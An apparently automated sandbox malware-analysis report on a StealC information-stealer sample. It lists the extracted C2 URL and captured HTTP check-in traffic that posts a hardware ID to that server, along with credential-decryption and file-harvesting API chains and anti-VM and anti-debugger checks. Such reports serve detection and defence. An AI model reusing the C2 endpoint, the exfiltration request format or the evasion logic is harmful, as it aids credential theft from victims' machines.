Windows Analysis Report
file.exe

AV Detection

Source: file.exe

Avira: detected

Source: 0.2.file.exe.f30000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Source: http://185.215.113.206/6c4adf523b719729.php/	Virustotal: Detection: 17%			Perma Link
Source: http://185.215.113.206/	Virustotal: Detection: 18%			Perma Link
Source: http://185.215.113.206	Virustotal: Detection: 18%			Perma Link
Source: http://185.215.113.206/6c4adf523b719729.php	Virustotal: Detection: 16%			Perma Link

Source: file.exe

Virustotal: Detection: 43%

Perma Link

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: file.exe

Joe Sandbox ML: detected

Cryptography

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,		0_2_00F49030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A2B0 CryptUnprotectData,LocalAlloc,LocalFree,		0_2_00F3A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,		0_2_00F372A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,		0_2_00F3A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,		0_2_00F3C920

Compliance

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp

Spreading

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,		0_2_00F440F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,		0_2_00F3E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,		0_2_00F447C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F3F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F31710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,		0_2_00F3DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F44B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,		0_2_00F43B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,		0_2_00F3BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,		0_2_00F3EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F3DF10

Networking

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"899DD10F13543207603164------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"tale------AFCAAEGDBKJJKECBKFHC--

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00F362D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="hwid"899DD10F13543207603164------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="build"tale------AFCAAEGDBKJJKECBKFHC--

Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpv
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/j
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206k
Source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F70098		0_2_00F70098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1		0_2_0138D1F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8B198		0_2_00F8B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0133D047		0_2_0133D047
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F62138		0_2_00F62138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013730D6		0_2_013730D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F74288		0_2_00F74288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9E258		0_2_00F9E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013893F8		0_2_013893F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01395206		0_2_01395206
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAD39E		0_2_00FAD39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0125E2AE		0_2_0125E2AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBB308		0_2_00FBB308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013025A4		0_2_013025A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138E47C		0_2_0138E47C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9D5A8		0_2_00F9D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F745A8		0_2_00F745A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F54573		0_2_00F54573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5E544		0_2_00F5E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012294E1		0_2_012294E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB96FD		0_2_00FB96FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136D73B		0_2_0136D73B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F766C8		0_2_00F766C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAA648		0_2_00FAA648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012457F6		0_2_012457F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA6799		0_2_00FA6799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013936AF		0_2_013936AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8D720		0_2_00F8D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012D56C9		0_2_012D56C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9F8D6		0_2_00F9F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F898B8		0_2_00F898B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8B8A8		0_2_00F8B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84868		0_2_00F84868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012BA841		0_2_012BA841
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01272BA2		0_2_01272BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F98BD9		0_2_00F98BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA4BA8		0_2_00FA4BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA0B88		0_2_00FA0B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01300D27		0_2_01300D27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAAC28		0_2_00FAAC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0131DC3A		0_2_0131DC3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84DC8		0_2_00F84DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F85DB9		0_2_00F85DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F61D78		0_2_00F61D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8BD68		0_2_00F8BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9AD38		0_2_00F9AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA1EE8		0_2_00FA1EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F78E78		0_2_00F78E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138AF92		0_2_0138AF92
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138FFE3		0_2_0138FFE3

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00F34610 appears 316 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00F49790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00F43970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WPDF5R83.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT name, value FROM autofillX;

Source: file.exe

Virustotal: Detection: 43%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2145792 > 1048576

Source: file.exe

Static PE information: Raw size of xpxnzipx is bigger than: 0x100000 < 0x1a0c00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F49BB0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x2166de should be: 0x21ab5b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xpxnzipx
Source: file.exe	Static PE information: section name: atgrbfaq
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5A0DC push eax; retf		0_2_00F5A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01290106 push ebp; mov dword ptr [esp], edx		0_2_01290120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0139D16E push 7AE96079h; mov dword ptr [esp], ebp		0_2_0139D1AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0139D16E push ecx; mov dword ptr [esp], 5B6F04D2h		0_2_0139D1F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0139D16E push ebx; mov dword ptr [esp], eax		0_2_0139D26C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0139D16E push 401DF8B4h; mov dword ptr [esp], ecx		0_2_0139D297
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0139D16E push 76E017CFh; mov dword ptr [esp], edx		0_2_0139D2B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_014311DF push ebx; mov dword ptr [esp], ecx		0_2_01431201
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01383182 push ecx; mov dword ptr [esp], ebp		0_2_013831D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push edx; mov dword ptr [esp], ebx		0_2_0138D1F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], eax		0_2_0138D29C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 5C864357h; mov dword ptr [esp], edi		0_2_0138D316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx		0_2_0138D39B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], 12DDE9E3h		0_2_0138D3CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], ecx		0_2_0138D3E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx		0_2_0138D400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 3FDB9E17h; mov dword ptr [esp], edi		0_2_0138D495
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], eax		0_2_0138D4C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx		0_2_0138D4CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], 20B28156h		0_2_0138D5A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 5F8A0B30h; mov dword ptr [esp], ecx		0_2_0138D5B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 03695830h; mov dword ptr [esp], ebp		0_2_0138D6B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 6083226Ah; mov dword ptr [esp], ecx		0_2_0138D6FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], 058DD1BCh		0_2_0138D732
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], edx		0_2_0138D753
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 13D5455Bh; mov dword ptr [esp], esp		0_2_0138D7EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], edx		0_2_0138D872
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 1637974Fh; mov dword ptr [esp], edi		0_2_0138D8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], ebp		0_2_0138D959
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push 4AD5F65Ah; mov dword ptr [esp], ebp		0_2_0138D9BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx		0_2_0138DAC0

Source: file.exe

Static PE information: section name: xpxnzipx entropy: 7.952407047426657

Boot Survival

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00F49BB0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121E1A2 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007FAF1CCF5656h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0131h] 0x00000016 clc 0x00000017 call dword ptr [ebp+122D2758h] 0x0000001d pushad 0x0000001e cld 0x0000001f xor eax, eax 0x00000021 mov dword ptr [ebp+122D2EF4h], edx 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c call 00007FAF1CCF5665h 0x00000031 mov ebx, dword ptr [ebp+122D29A1h] 0x00000037 pop ecx 0x00000038 push ebx 0x00000039 jmp 00007FAF1CCF5668h 0x0000003e pop esi 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2A61h], eax 0x00000046 or dword ptr [ebp+122D3381h], ebx 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2EF4h], edx 0x00000057 jmp 00007FAF1CCF565Fh 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007FAF1CCF5668h 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1882h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007FAF1CCF5665h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2EF4h], ebx 0x00000080 jp 00007FAF1CCF5657h 0x00000086 stc 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jbe 00007FAF1CCF5658h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139C889 second address: 139C8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 jmp 00007FAF1CBF1D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FAF1CBF1D46h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139C8C0 second address: 139C8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
